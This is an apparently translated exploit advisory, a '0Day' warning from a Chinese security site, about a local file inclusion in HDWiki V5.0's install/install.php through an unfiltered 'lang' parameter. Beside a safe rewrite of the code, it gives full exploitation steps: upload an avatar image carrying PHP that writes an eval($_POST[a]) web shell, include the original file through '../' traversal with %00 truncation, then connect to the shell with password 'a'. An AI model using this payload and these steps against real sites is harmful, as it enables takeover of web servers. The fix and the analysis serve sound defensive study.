HDWiKi V5.0 local file include vulnerability (0Day) - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201128949
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-01-26T00:00:00


Release date: 2011-01-23
Publishing author: HYrz

Affected versions: HDWiKi V5.0
Official website: http://kaiyuan.hudong.com

Vulnerability type: file inclusion

Vulnerability description:

The source code confirms the problem: an uploaded picture containing PHP code can be included normally. The catch is that HDWiki processes images at upload time, so simply uploading a PHP file with an image extension is not enough, and bundling a picture with the PHP code does not work either. During debugging I found that the content of the uploaded picture is completely rewritten, so the copy that ends up being served cannot be included usefully. In the image-processing stage the program first checks the file header to confirm the image format; once that check passes it does not write the submitted file to the server as-is, but re-encodes the picture. This is why a picture with embedded PHP, once uploaded and opened in Notepad, no longer shows the PHP code. The upload module has a serious defect, however: while processing the picture, it also keeps the original file on the server, and the PHP code inside that original is never touched. Including the original file is therefore enough to obtain a shell.

Vulnerable file: \install\install.php

Key code:

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define('IN_HDWIKI', TRUE);
define('HDWIKI_ROOT', '../');

$lang_name = $_COOKIE['lang_name']; /* lang_name is taken straight from the cookie, without any filtering */
if (isset($_REQUEST['lang'])) {
    /* If the request carries a lang value it is used unfiltered and overrides the cookie value above */
    $lang_name = $_REQUEST['lang'];
    setcookie('lang_name', $lang_name);
}
if (!$lang_name) {
    /* Only an empty value is rejected; any non-empty value passes, otherwise lang_name is initialised to EN */
    $lang_name = 'EN';
}

require HDWIKI_ROOT."/lang/$lang_name/install.php"; /* trivially bypassed: a %00 truncates the trailing "/install.php", so an arbitrary file is included; without the null byte an error occurs */
require HDWIKI_ROOT.'/version.php';
require HDWIKI_ROOT.'/model/base.class.php';
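For comparison, the same language selection written so that only an existing directory name under lang/ can reach the require. This is an added example, not HDWiki's own patch; it assumes the advisory's layout (HDWIKI_ROOT . '/lang/<name>/install.php') and that an EN directory exists.

```php
<?php
// Added example, not HDWiki's own patch: the lang-selection logic from install.php
// rewritten so that the value reaching require is always a validated directory name.
// Assumes the layout from the advisory: HDWIKI_ROOT . '/lang/<name>/install.php'.
define('HDWIKI_ROOT', '../');
define('DEFAULT_LANG', 'EN');

/**
 * Reduce an attacker-controlled value to a safe language directory name.
 * Returns DEFAULT_LANG whenever the value is not a plain, existing directory name.
 */
function resolve_lang_dir($requested)
{
    // One path segment only: no "/", "\", "." or NUL byte can match this pattern,
    // so a value such as "../uploads/userface/2/2_src.jpg%00" is rejected before
    // the filesystem is consulted. is_string() guards against lang[]=... arrays.
    if (!is_string($requested) || !preg_match('/^[A-Za-z][A-Za-z0-9_-]{0,31}$/', $requested)) {
        return DEFAULT_LANG;
    }
    // Defence in depth: resolve both paths and confirm the candidate is a real
    // directory that still lies inside lang/ (realpath() also collapses symlinks).
    $lang_root = realpath(HDWIKI_ROOT . '/lang');
    $candidate = realpath(HDWIKI_ROOT . '/lang/' . $requested);
    if ($lang_root === false || $candidate === false || !is_dir($candidate)
        || strpos($candidate, $lang_root . DIRECTORY_SEPARATOR) !== 0) {
        return DEFAULT_LANG;
    }
    return basename($candidate);
}

// The request parameter still wins over the cookie, as in the original, but both
// pass through the same check and the cookie is only ever set to a validated value.
$requested = isset($_REQUEST['lang']) ? $_REQUEST['lang']
          : (isset($_COOKIE['lang_name']) ? $_COOKIE['lang_name'] : DEFAULT_LANG);
$lang_name = resolve_lang_dir($requested);
setcookie('lang_name', $lang_name);

require HDWIKI_ROOT . '/lang/' . $lang_name . '/install.php';
```

The whitelist pattern alone closes the traversal and null-byte truncation described above; the realpath() check additionally catches a language directory that is a symlink pointing outside lang/.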

Exploitation steps:

  1. Register a user on the HDWiKi site.

  2. In the personal management page, upload a picture containing the following PHP code:

<? $fp = @fopen("HYrz.php", 'a'); @fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a])'."\r\n\r\n?".">\r\n"); @fclose($fp); ?>

  3. Right-click the uploaded image to get its address, for example http://localhost/uploads/userface/2/2.jpg?0.8622666412804486; only the part http://localhost/uploads/userface/2/2.jpg matters.

     Although this address is served, the file itself does not exist on disk. Change 2.jpg to 2_src.jpg, e.g. http://localhost/uploads/userface/2/2_src.jpg.

  4. Visit http://localhost/install/install.php?lang=../uploads/userface/2/2_src.jpg%00 (note: the "2" here and above depends on the actual situation; if the image is http://localhost/uploads/userface/5/5_src.jpg, then visit http://localhost/install/install.php?lang=../uploads/userface/5/5_src.jpg%00).

  5. Connect to the one-line shell (一句话) at http://localhost/install/HYrz.php with password: a

Test environment:

Web server: WinXP + Apache 2.2.15

PHP settings:
allow_url_fopen    On
allow_url_include  Off
magic_quotes_gpc   Off